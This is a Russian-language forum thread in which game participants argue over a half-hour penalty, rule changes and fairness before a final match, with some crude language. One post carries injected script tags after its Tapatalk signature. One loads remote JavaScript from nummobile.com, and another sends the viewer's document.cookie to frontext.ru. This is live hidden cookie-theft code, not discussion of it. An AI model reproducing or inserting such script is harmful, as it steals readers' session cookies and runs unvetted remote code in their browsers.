![]() |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Получасовой штраф на трехчасовой игре както немного несовместим с призовыми местами, но даже на таких условиях я согласен выйти на финальную игру - хочется уже наконецто доиграть это. Отправлено с моего ThL W3 через Tapatalk <script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
Цитата:
по сути - плюсую к Косте. |
Цитата:
По сути: мне очень печально, что пакмэн занимается таким буквоедством и придирками, которые никому не нужны. Ситуация вполне ясна, меры адекватные, игра фо фан) |
Может я конечно несколько со своей колокольни, но всё же игра вроде как задумывалась как игра for fan, и изначально у людей не было особого желания всех дёрнуть, видимо люди начали париться по этому поводу по причине кучи потраченного времени. Вот мне честно говоря пофиг, игра же не в зачёт, объявят ту или иную команду победителем, это ведь формальность, тут вот точно важнее сам игровой процесс.
А вообще у меня тоже много раз возникало желание щёлкнуть подсказку и посмотреть, что там написано, но я почему то не "психанул". Панч, если основания снимать баян, а не делать его сталкером были, то вот тут ситуация какая-то некрасивая, вроде того, что- "все равны, но есть ровнее". Если людям пятихатку жалко, то пусти их сыграть бесплатно, сразу последнее место назначь и делов всего, будет честно. я тут нуб, да. |
Цитата:
Лично для меня печально, что изменение правил никак вообще не мотивируется организаторами. |
Цитата:
|
Цитата:
|
Велко, ты клевый, расслабься и получай удовольствие от игры, все будет хорошо, это просто игра :) каждый играет как умеет и может - вы крутаны! Зачем скатываться до графоманства и выяснения глупостей и мелочей? Только нервные клетки убивать, а нужно наоборот получать удовольствие...;)
|
Цитата:
не бузи =) |
Цитата:
|
Цитата:
Цитата:
|
С Громом какая-то хуйня творится...
Надо троллить, пересыпать саркастическими подъебами и завуалированными оскорблениями. Только так. Только хардкор! |
А кто есть команда Фантомас?)))
326 вбитых кодов за 8 часов чистого времени...внушает! Руслан, я разочаровал тебя? Вот где справедливость?! Подъебываешь - не нравится, не подъебываешь - тоже хуйня :confused::( |
Да кто ж его знает где она, эта справедливость...
|
Цитата:
Может кто-то от кого-то отделился, хз. |
Цитата:
|
Часовой пояс GMT +3, время: 15:50. |